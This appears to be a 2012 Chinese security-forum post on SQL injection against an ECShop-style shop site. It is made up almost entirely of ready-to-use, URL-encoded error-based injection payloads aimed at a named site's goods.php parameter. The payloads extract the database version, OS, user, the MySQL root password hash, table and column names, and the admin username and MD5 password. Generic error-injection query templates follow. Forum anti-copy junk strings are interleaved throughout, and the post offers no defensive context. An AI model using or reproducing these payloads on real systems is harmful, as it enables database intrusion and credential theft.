找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2062|回复: 0
打印 上一主题 下一主题

盲注详细内容

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-5 14:59:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
判断版本号 ( l" ~% |( \% `0 l7 g
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23( w; R% V8 \! R9 Y* W; q

5 h/ M' Z# E: u. c. D4 [判断系统
  x5 l3 B$ E7 F
4 z6 {3 W. w5 i$ ]: ahttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%230 d$ C  F' w( _8 W# c

' z$ Y7 [. Y1 |  [/ ]7 u0 I3 T6 S# \$ L, M
/ r7 n" i! a( ~9 J) ]' \; ]
当前 user()
3 r1 P+ ?! S* w7 M; E! D1 e
& G# u0 l. a& Y: Y0 \! B8 t+ F* dhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23! a  d0 N% b$ g$ T( R

8 W/ U) O1 Z- o9 @8 G( t- G' l) J6 U! o# g7 T) I
8 L" W+ G, \/ d% N4 t$ ]; ]+ b
当前 database()
% j/ o1 x% Y. T3 I, Uhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
: v1 j; u5 `0 @3 i  t2 p4 m
; T+ ~; D  `# t9 m+ k6 _3 h
# X6 N0 n2 F! h8 T2 g* Y6 y; D5 z% V: b' [
: \7 q! B4 E! h( u7 L5 Q: u
root hash5 S+ u/ T6 y) i2 U3 z

" y. w: F! w) [9 Vhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, T9 I, j2 M, ?
' i  K1 o. o; T) M# C
$ W; E! D8 Z/ ?0 F% Z' ?# }" ?9 r
! ~4 }$ w- x  ]  v' j4 _5 O
当前 数据库表名, H: Z) m5 U+ f3 \( s  c3 t. {% ^# t

3 v8 R5 i* O: B% q( N5 Whttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, l! `. A! g" p' @7 d2 u. g
, O% W: A+ n% t- o# ?9 s$ w. Y& N2 n! j; q1 w7 e' h4 U) U

5 q' l' h, a7 D+ |8 ^. _. @% T当前 数据库 user_name 字段( @8 F/ X; [( C, ^& M

% c5 a7 a: |0 |; z7 |# }http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23" W" m* T& @, G9 g! G" D3 u
6 m% T9 S! ~  l
当前 数据库 字段 password0 p( ^4 H# S) y
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23, E- y7 f: ^! A: A7 D0 U+ \
( p" t1 H9 M  H. |" v: W3 o3 w
) ~& ~+ s+ X- [" Q

& |/ X+ H5 T! ?( O5 I" j) y- \+ n获得 admin passwd(md5)
& q4 y6 Q8 d$ ]& z' ], G  p$ ^! \+ i- ?8 R

9 x+ ?8 c! f+ |http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23& A+ ?* u- g4 @) R' F0 {

; K" z0 y. C' w+ |1 A. _报错注射& U$ W! J0 f( o/ D7 i2 F" |
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a). C# l, B* e$ u: ]3 d  r$ h4 u

/ t" {  d5 ]; f+ U$ S" {! [SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a), U* B1 b) f# l, ^$ b% G, T0 {+ Z- O
% S9 C/ ?0 _* Z6 _# F
and(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表